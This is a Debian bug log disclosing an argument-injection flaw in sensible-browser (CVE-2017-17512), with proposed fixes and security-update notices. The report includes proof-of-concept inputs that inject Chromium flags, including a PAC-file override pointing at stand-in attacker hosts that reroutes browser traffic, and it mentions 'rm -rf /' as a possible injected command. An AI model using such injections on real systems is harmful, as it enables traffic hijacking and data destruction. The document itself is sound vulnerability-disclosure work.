Debian Bug report logs - #881767
sensible-utils: CVE-2017-17512: Argument injection in sensible-browser

version graph

Package: sensible-utils; Maintainer for sensible-utils is Anibal Monsalve Salazar <anibal@debian.org>; Source for sensible-utils is src:sensible-utils (PTS, buildd, popcon).

Reported by: Gabriel Corona <gabriel.corona@enst-bretagne.fr>

Date: Tue, 14 Nov 2017 22:21:02 UTC

Severity: grave

Tags: security

Found in version sensible-utils/0.0.10

Fixed in versions sensible-utils/0.0.11, sensible-utils/0.0.9+deb9u1, sensible-utils/0.0.9+deb8u1

Done: Salvatore Bonaccorso <carnil@debian.org>

Bug is archived. No further changes may be made.

View this report as an mbox folder, status mbox, maintainer mbox


Report forwarded to debian-bugs-dist@lists.debian.org, roucaries.bastien+debian@gmail.com, team@security.debian.org, secure-testing-team@lists.alioth.debian.org, Anibal Monsalve Salazar <anibal@debian.org>:
Bug#881767; Package sensible-utils. (Tue, 14 Nov 2017 22:21:04 GMT) (full text, mbox, link).


Acknowledgement sent to Gabriel Corona <gabriel.corona@enst-bretagne.fr>:
New Bug report received and forwarded. Copy sent to roucaries.bastien+debian@gmail.com, team@security.debian.org, secure-testing-team@lists.alioth.debian.org, Anibal Monsalve Salazar <anibal@debian.org>. (Tue, 14 Nov 2017 22:21:04 GMT) (full text, mbox, link).


Message #5 received at submit@bugs.debian.org (full text, mbox, reply):

From: Gabriel Corona <gabriel.corona@enst-bretagne.fr>
To: Debian Bug Tracking System <submit@bugs.debian.org>
Subject: sensible-utils: Argument injection in sensible-browser
Date: Tue, 14 Nov 2017 23:17:13 +0100
Package: sensible-utils
Version: 0.0.10
Severity: grave
Tags: security
Justification: user security hole

When the BROWSER environment variable is set, an invalid URI can be
used to inject arguments in sensible-browser.


Description
===========

When BROWSER is set, sensible-browser calls the actual browser with:

~~~sh
cmd=$(printf "$i\n" "$URL")
$cmd && exit 0
~~~

If a IFS character is in $URL, this leads to the injection of extra
arguments when calling the actual browser.

For example, this commands triggers the incognito mode of Chromium:

~~~sh
BROWSER=chromium sensible-browser "http://www.example.com/ --incognito
~~~

This URI is invalid but if the caller does not properly validate the
URI, an attacker could add extra arguments when calling the browser.


For example, Emacs might call sensible-browser with an invalid
URI. With this configuration:

~~~elisp
(setq browse-url-browser-function (quote browse-url-generic))
(setq browse-url-generic-program "sensible-browser")
~~~

an org-mode file like this one:

~~~org
[[http://www.yahoo.fr --incognito][test]]
~~~

will trigger the incognito mode of Chromium (this does not happen with
org-mode 8.2.10 shipped in the emacs25 package but it does happen
using org-mode 9.1.2 shipped in the elpa-org package).


While this particular example is not very dangerous other arguments
can be more harmful. For example, it is possible to inject an argument
which overrides the proxy configuration (with a PAC file). This
org-mode link launches Chromium with an alternative PAC file
(silently):


~~~org
[[http://www.example.com/ --proxy-pac-file=http://dangerous.example.com/proxy.pac][test]]
~~~

An attacker could use this type of URI, to forward all the traffic
coming from the browser to a server he's controlling.



Possibles fixes
===============

* A simple fix, would be for sensible-browser to actually check that
  the URI parameter does not contain any IFS character (which are not
  valid in URI or IRI and fail if it does).  It should probably add
  extra verification (such as checking that the argument does not
  begin by a dash).

* Another solution would be to escape IFS characters.

* The simpler fix would probably to drop support for "%s" in the
  BROWSER string: this feature is not supported by other programs
  anyway. This is "Alternative Secure BROWSER Definition" in [1].

* Or we could implement "Compatible Secure BROWSER Definition" from
  [1] but it may not be very convenient to do in shell.

Moreover, we should probably add some basic URI validation in order to
reject things like:

~~~sh
BROWSER=chromium sensible-browser "--incognito"
~~~



Additional problems
===================

sensible-browser does not handle empty browser in the BROWSER
environment variable:

~~~sh
BROWSER=":chromium" sensible-browser "xterm"
~~~

This command runs xterm (we could have used "rm -rf /").



Similar vulnerabilities in other packages
=========================================

* lilypond

  lilypond-invoke-editor is vulnerable to the same argument injection
  [2]:

  ~~~sh
  BROWSER="chromium" lilypond-invoke-editor "http://www.example.com/ --incognito"
  ~~~
  
  Lilypond suggests using it as URI handler [3]:

  > When this functionality is active, LilyPond adds hyperlinks to the
  > PDF file. These hyperlinks are sent to a ‘URI helper’
  > or a web-browser, which opens a text-editor with the cursor in
  > the right place.
  >
  > To make this chain work, you should configure your PDF viewer
  > to follow hyperlinks using the ‘lilypond-invoke-editor’
  > script supplied with LilyPond.
  >
  > The program ‘lilypond-invoke-editor’ is a small helper program.
  > It will invoke an editor for the special textedit URIs, and run
  > a web browser for others. [...]

* xdg-open

  xdg-open's 'envvar' implementation (open_envvar) has this same
  problem when '%s' is present in $BROWSER:

  # Triggers incognito mode:
  BROWSER="chromium %s" xdg-open "http://www.example.com/ --incognito"

  # Does not trigger incognito mode:
  BROWSER="chromium" xdg-open "http://www.example.com/ --incognito"


References
==========

[1] https://www.dwheeler.com/browse/secure_browser.html

[2] http://sources.debian.net/src/lilypond/2.18.2-9/scripts/lilypond-invoke-editor.scm/#L129

[3] http://lilypond.org/doc/v2.18/Documentation/usage/configuring-the-system-for-point-and-click

[4] https://specifications.freedesktop.org/desktop-entry-spec/1.1/ar01s06.html


Thanks to Bastien Roucaries for some material and references.

-- System Information:
Debian Release: buster/sid
  APT prefers testing
  APT policy: (500, 'testing'), (500, 'stable'), (90, 'unstable'), (1, 'experimental')
Architecture: amd64 (x86_64)
Foreign Architectures: i386

Kernel: Linux 4.13.0-1-amd64 (SMP w/4 CPU cores)
Locale: LANG=fr_FR.utf8, LC_CTYPE=fr_FR.utf8 (charmap=UTF-8), LANGUAGE=fr_FR.utf8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: systemd (via /run/systemd/system)

-- no debconf information

Reply sent to Bastien Roucariès <rouca@debian.org>:
You have taken responsibility. (Wed, 15 Nov 2017 21:15:10 GMT) (full text, mbox, link).


Notification sent to Gabriel Corona <gabriel.corona@enst-bretagne.fr>:
Bug acknowledged by developer. (Wed, 15 Nov 2017 21:15:10 GMT) (full text, mbox, link).


Message #10 received at 881767-close@bugs.debian.org (full text, mbox, reply):

From: Bastien Roucariès <rouca@debian.org>
To: 881767-close@bugs.debian.org
Subject: Bug#881767: fixed in sensible-utils 0.0.11
Date: Wed, 15 Nov 2017 21:10:37 +0000
Source: sensible-utils
Source-Version: 0.0.11

We believe that the bug you reported is fixed in the latest version of
sensible-utils, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 881767@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Bastien Roucariès <rouca@debian.org> (supplier of updated sensible-utils package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Format: 1.8
Date: Wed, 15 Nov 2017 16:30:02 +0100
Source: sensible-utils
Binary: sensible-utils
Architecture: source
Version: 0.0.11
Distribution: unstable
Urgency: high
Maintainer: Anibal Monsalve Salazar <anibal@debian.org>
Changed-By: Bastien Roucariès <rouca@debian.org>
Description:
 sensible-utils - Utilities for sensible alternative selection
Closes: 289745 881767
Changes:
 sensible-utils (0.0.11) unstable; urgency=high
 .
   * Bug fix: "Argument injection in sensible-browser", thanks to Gabriel
     Corona (Closes: #881767). Fixing this bug by not supporting %s
     expansion in $BROWSER. Users needing this feature (like running
     'firefox -remote "openURL(%s,new-window)"',  with %s the URL)
     could use a shell wrapper. Remove also multiple browser support.
   * Fixing #881767 means not using unsupportable %s in $BROWSER, thus
     Closes: #289745.
Checksums-Sha1:
 c072b9cd1ea5520027c33e9049d91f3e2379ccd3 1671 sensible-utils_0.0.11.dsc
 fe6ceb0ddc2b6ca3b7f360d52f9dbbc3cb531302 61448 sensible-utils_0.0.11.tar.xz
 d5a2091f5e972c6664ac3e9e773db40f133c8813 4278 sensible-utils_0.0.11_source.buildinfo
Checksums-Sha256:
 00bd8cde4229752593ee06f562f8cd8d91ed3a138b2339417ccd6539e542a5c5 1671 sensible-utils_0.0.11.dsc
 f1702bc0c129cfe18fb9ae8c0c7b7aedb5b2e6c0467ab3e1da18a8bbb21fe131 61448 sensible-utils_0.0.11.tar.xz
 d301ec9efd77b6e1ae90aa8d92b95712973a64f49eaceab2684d227ec8ccacd1 4278 sensible-utils_0.0.11_source.buildinfo
Files:
 7dd672249b9be164ea6a5280c95f50aa 1671 utils required sensible-utils_0.0.11.dsc
 43e55555f68935e5a9cd9bd5961f72c2 61448 utils required sensible-utils_0.0.11.tar.xz
 9f06f3e0428cd28ea8afd2a69903f72f 4278 utils required sensible-utils_0.0.11_source.buildinfo

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEXQGHuUCiRbrXsPVqADoaLapBCF8FAloMpyIACgkQADoaLapB
CF+0jQ//f2Yky+u0OUoi+3yOG5WmwZFwyGnlyqX38sQiP8nO2+qOYKrh5EY/pjLT
I0N6YSrRoldyAu4zFuC6WKGxmq7bxNlrhsgfCs8l1H2R/aqXeIuMfiL7tF90xW1l
lt9CMYzNClaMXmBVaU/E1JJ9Ei4+qmn8HEnDawfER3WX6aiIdNtvnXzAqG1PrGkT
Tvi5sxnbLXP6cMsx4RsvdAEmzJ9eVwivt8dxIugel3tBFK9dibm/I8HqLcDvDHVQ
sU1iHTwuqsNckkQDzE61YFbnOQ0abcVeeVg+5zqGv2mfgY0vFPb0P7eamarV0rpN
HUQMJyu2xZgcUzg3cUBUfzrBYc/Ien4DjHbKRhMe1pM063wyoimhjfVvk7LmL/pW
esUQTdvIU3yE1KVbs07fuysT/7V2CW8Bd37G18sPZEFxrXnURiSvTvxuiGRESdFr
mE8fB3aD65ZVLmMOCQwIpWNxE2FTOKuhiN48MBPZIxzxfena9lgJzv23eDk2bMrK
x5GFODcVwAc5hBDOTuZbgp91n1U8U7XzPLxgjG5dXgS00LMndb+8EC9061geMReQ
kyIYMPGLvfzP4T5JsT/emBGktcpxqMCO0m4drfvR1ABAdD/88RpNFr4hp3cgwr3H
gHUaSe8WP8JGKYw9BwC4dkDgvkZXg6t2dnp+JvHQpeHyqzqOfHY=
=mbfr
-----END PGP SIGNATURE-----




Information forwarded to debian-bugs-dist@lists.debian.org, Anibal Monsalve Salazar <anibal@debian.org>:
Bug#881767; Package sensible-utils. (Wed, 15 Nov 2017 22:30:03 GMT) (full text, mbox, link).


Acknowledgement sent to Gabriel Corona <gabriel.corona@enst-bretagne.fr>:
Extra info received and forwarded to list. Copy sent to Anibal Monsalve Salazar <anibal@debian.org>. (Wed, 15 Nov 2017 22:30:03 GMT) (full text, mbox, link).


Message #15 received at 881767@bugs.debian.org (full text, mbox, reply):

From: Gabriel Corona <gabriel.corona@enst-bretagne.fr>
To: 881767@bugs.debian.org
Subject: Re: Bug#881767 closed by Bastien Roucariès <rouca@debian.org> (Bug#881767: fixed in sensible-utils 0.0.11)
Date: Wed, 15 Nov 2017 23:26:52 +0100
Hi,

> Source: sensible-utils
> Source-Version: 0.0.11
> 
> We believe that the bug you reported is fixed in the latest version of
> sensible-utils, which is due to be installed in the Debian FTP archive.

I can't find the source of the new version yet so I can't review it
yet.

I think we need to exclude URI starting with `-` or `--` as
well. Otherwise an attacker might pass flags (such as
--proxy-pac-url=http://evil.example.com/proxy.pac) with:

    BROWSER=chromium sensible-browser ----proxy-pac-url=http://evil.example.com/proxy.pac

Seometing like:

  if ! echo -n "$URL" | head -n1 | grep '^[a-zA-Z][a-zA-Z0-9+\-.]*:' > /dev/null ; then
    exit 1
  fi

or:

  if ! echo -n "$URL" | grep -z '^[a-zA-Z][a-zA-Z0-9+\-.]*:' > /dev/null ; then
    exit 1
  fi

or:

  case "$1" in
      -*)
  	  exit 1
  	  ;;
      *)
	  true
	  ;;
  esac

By the way, this line is vulenable as well:

  exec /usr/bin/gnome-terminal -e "/usr/bin/www-browser ${URL:+\"$URL\"}"

For example:

  URL='http://www.example.com/" "--incognito' ; /usr/bin/gnome-terminal -e "chromium ${URL:+\"$URL\"}"

A possible fix is to use:

  exec /usr/bin/gnome-terminal -- "/usr/bin/www-browser" ${URL:+"$URL"}

Cheers,

-- 
Gabriel



Changed Bug title to 'sensible-utils: CVE-2017-17512: Argument injection in sensible-browser' from 'sensible-utils: Argument injection in sensible-browser'. Request was from Salvatore Bonaccorso <carnil@debian.org> to control@bugs.debian.org. (Mon, 11 Dec 2017 09:15:05 GMT) (full text, mbox, link).


Reply sent to Salvatore Bonaccorso <carnil@debian.org>:
You have taken responsibility. (Sun, 24 Dec 2017 13:09:05 GMT) (full text, mbox, link).


Notification sent to Gabriel Corona <gabriel.corona@enst-bretagne.fr>:
Bug acknowledged by developer. (Sun, 24 Dec 2017 13:09:05 GMT) (full text, mbox, link).


Message #22 received at 881767-close@bugs.debian.org (full text, mbox, reply):

From: Salvatore Bonaccorso <carnil@debian.org>
To: 881767-close@bugs.debian.org
Subject: Bug#881767: fixed in sensible-utils 0.0.9+deb9u1
Date: Sun, 24 Dec 2017 13:06:25 +0000
Source: sensible-utils
Source-Version: 0.0.9+deb9u1

We believe that the bug you reported is fixed in the latest version of
sensible-utils, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 881767@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Salvatore Bonaccorso <carnil@debian.org> (supplier of updated sensible-utils package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Format: 1.8
Date: Wed, 20 Dec 2017 14:39:04 +0100
Source: sensible-utils
Binary: sensible-utils
Architecture: source
Version: 0.0.9+deb9u1
Distribution: stretch-security
Urgency: high
Maintainer: Anibal Monsalve Salazar <anibal@debian.org>
Changed-By: Salvatore Bonaccorso <carnil@debian.org>
Closes: 881767
Description: 
 sensible-utils - Utilities for sensible alternative selection
Changes:
 sensible-utils (0.0.9+deb9u1) stretch-security; urgency=high
 .
   * Non-maintainer upload by the Security Team.
   * Argument injection in sensible-browser (CVE-2017-17512)
     Thanks to Gabriel Corona (Closes: #881767)
Checksums-Sha1: 
 fad73d699e28bddd1cfb5b77d1a299274e66d091 1590 sensible-utils_0.0.9+deb9u1.dsc
 a41cadb8acad1ac29bc376183a6ccc24d89a489f 53564 sensible-utils_0.0.9+deb9u1.tar.xz
Checksums-Sha256: 
 93641a0b5bb3b24b6f01daaf6d99cc1221678b150f19fc8a5c603cacdaecd6e2 1590 sensible-utils_0.0.9+deb9u1.dsc
 103a4666ddad53452b849d20c2509a6356d9aa6a60c515df9983bd0ca897a3db 53564 sensible-utils_0.0.9+deb9u1.tar.xz
Files: 
 da0fa8e20cb26776a95ba9a5d93b18a0 1590 utils required sensible-utils_0.0.9+deb9u1.dsc
 87f73f5f1a138448303fca9ed0d6060f 53564 utils required sensible-utils_0.0.9+deb9u1.tar.xz

-----BEGIN PGP SIGNATURE-----

iQKmBAEBCgCQFiEERkRAmAjBceBVMd3uBUy48xNDz0QFAlo6kMRfFIAAAAAALgAo
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQSHGNhcm5pbEBk
ZWJpYW4ub3JnAAoJEAVMuPMTQ89EL8MQAJn4b6X2CyFpzAJ72psa1cz7HrIVOsia
Zw96r4LJxB1NNWJ9bF/JPdvjToKn2jltZGnyq6TAxYEdoIPJ9SW3A5H3T0idWXBY
RVxR37CohRZiiGnku/W/pzBjyak5ZBv33u8tOqL1mFtRY5dzLt6/EnUCzGMRm8Te
tR5kgjB93EVJe1MRabAZEYYN7frVh4QSnN4u1hULf337mElKvMCDeGh/Mb0uFY5Y
ELkNQA8DHOQKzr0fLH8H664tDWaknAGeHuEqlLEDRR3KxOF0oWQCcPYB6lgFZ5w6
vLMl3MTQI3LQ3oqMfoBonfD+K7c2L2VzoJgjriZ+433yZ6WL330uL03s5UPKgiDc
H0fV49M6eLh8Gt1aahvUo/LmnQVXuKQvXhd5T+aVWD1DMhpfopruxImJ2CBzUgU1
dYQ71lqXp+LXkuIkxboGCb2krlBOsUVMTf1ZGPyE7OC7XWCi6w3VtWc/KgN0ml9/
1lTjfgNv2+5lh/FbFAaggfd99Yy6n+OhrTrzi2ZX9N8LUvIXBKHcUUJ7wxU3Hnj/
u6ITFgGOlep8fIDobx07QMhKl9TapNEFWygI2SVXNV7CoesWwjXVF/K6/tznd3eo
s4z9wlC7OgDFLN8csfH3dEdtJqknlRaLnPAcoR9JB8nwtKgEVvID8BhOknPWOfaj
YwC1bsFhQTwm
=aWtE
-----END PGP SIGNATURE-----




Reply sent to Salvatore Bonaccorso <carnil@debian.org>:
You have taken responsibility. (Mon, 25 Dec 2017 10:36:10 GMT) (full text, mbox, link).


Notification sent to Gabriel Corona <gabriel.corona@enst-bretagne.fr>:
Bug acknowledged by developer. (Mon, 25 Dec 2017 10:36:10 GMT) (full text, mbox, link).


Message #27 received at 881767-close@bugs.debian.org (full text, mbox, reply):

From: Salvatore Bonaccorso <carnil@debian.org>
To: 881767-close@bugs.debian.org
Subject: Bug#881767: fixed in sensible-utils 0.0.9+deb8u1
Date: Mon, 25 Dec 2017 10:33:40 +0000
Source: sensible-utils
Source-Version: 0.0.9+deb8u1

We believe that the bug you reported is fixed in the latest version of
sensible-utils, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 881767@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Salvatore Bonaccorso <carnil@debian.org> (supplier of updated sensible-utils package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Format: 1.8
Date: Wed, 20 Dec 2017 14:39:04 +0100
Source: sensible-utils
Binary: sensible-utils
Architecture: all source
Version: 0.0.9+deb8u1
Distribution: jessie-security
Urgency: high
Maintainer: Anibal Monsalve Salazar <anibal@debian.org>
Changed-By: Salvatore Bonaccorso <carnil@debian.org>
Closes: 881767
Description: 
 sensible-utils - Utilities for sensible alternative selection
Changes:
 sensible-utils (0.0.9+deb8u1) jessie-security; urgency=high
 .
   * Non-maintainer upload by the Security Team.
   * Argument injection in sensible-browser (CVE-2017-17512)
     Thanks to Gabriel Corona (Closes: #881767)
Checksums-Sha1: 
 4b826e2878100c4c24c0ef34e355f06500980483 1590 sensible-utils_0.0.9+deb8u1.dsc
 691e5045a928a8602b7a8c12cfa61513d8a5d7a9 53544 sensible-utils_0.0.9+deb8u1.tar.xz
 2489ab1c561726f0eb4d2ca8c464fa13f673c2b8 10886 sensible-utils_0.0.9+deb8u1_all.deb
Checksums-Sha256: 
 1d1d3d7e71c53cceb922dc33db5064cb5be76450a2918f8e3f998824237f09b0 1590 sensible-utils_0.0.9+deb8u1.dsc
 f4b505ecc1c5015df2e5d3595da12cceca54be8729270b054179d31d8d661ab9 53544 sensible-utils_0.0.9+deb8u1.tar.xz
 0de3d1447f16851862e57951a6779c5adc9a97d0438092b2761c0d989c64ae9c 10886 sensible-utils_0.0.9+deb8u1_all.deb
Files: 
 af585e62eb03b0a7cac27159e398b7ea 1590 utils required sensible-utils_0.0.9+deb8u1.dsc
 3235de9d52930f381b9e777ef1cf7d4a 53544 utils required sensible-utils_0.0.9+deb8u1.tar.xz
 c538301ccd44538097ebe8ecf883534f 10886 utils required sensible-utils_0.0.9+deb8u1_all.deb

-----BEGIN PGP SIGNATURE-----

iQKmBAEBCgCQFiEERkRAmAjBceBVMd3uBUy48xNDz0QFAlo6kX1fFIAAAAAALgAo
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQSHGNhcm5pbEBk
ZWJpYW4ub3JnAAoJEAVMuPMTQ89EXB0P/iAQrZkSL7EzhSDYOJLJFHM9UbHT8Os1
m2temBcIz2ZS5FKqGXHh61aY6sSDbilWoOrqPTS5Ho0kB+Bd5Pg16b3nxE3MdFLn
DQN0AjSSB8J+eSbcN/TbtlMgOAV1mgC7q9ox72j17yrQSWGJbu5IccTUQT8YbeWM
urK3P39jBtlK5nESJoF6goH+Vlu/nw9Jllu/PCvxZtS+fu+Tl+W+evntokwsBw7D
PPKIzrIiCSH2niKdpTjmXF8TRhFa6adcy2wUlO9PoNvWlnXSQgagICd/TnqArmLi
fn0P4xbk2YtneIrErxTFTuhOfokFAT+0wGhEbw65xLAn/S89GL0rlaPAVq9EDEXA
Qyq5xAk4m3t7U5qZxW9pFbq4WU/Mkxw5Ywy+DEKXnLA8ntVfDcAtBGeiXaCAqjD5
N+ORO7ury3MgxSFBqjCDrtt9NevzRDoTDaoacBHID/OEHEFVr12HxHvZwFZxUw/i
IUx0NXsvjQpE2B7GIX0G0QEaeKMW2+xft9x13P0dpmPSEqM8sRMPomOCC7OEo3SG
TXKhg3x8rhoeks4fKHW4f7LjhUJuph/U6Hf4s+o8n3Pz4TIpktp0ShwZqHwd9Utb
1Qz4B8p2d276l7zgjT+xhBIemiegv36XR2E2kkT74WvU9zxFuckO1arlHffFb+/k
8d0eCCw7p+pM
=Dmrp
-----END PGP SIGNATURE-----




Bug archived. Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Tue, 23 Jan 2018 07:27:52 GMT) (full text, mbox, link).


Send a report that this bug log contains spam.


Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Sun Apr 20 00:35:08 2025; Machine Name: bembo

Debian Bug tracking system

Debbugs is free software and licensed under the terms of the GNU General Public License version 2. The current version can be obtained from https://bugs.debian.org/debbugs-source/.

Copyright © 1999 Darren O. Benham, 1997,2003 nCipher Corporation Ltd, 1994-97 Ian Jackson, 2005-2017 Don Armstrong, and many other contributors.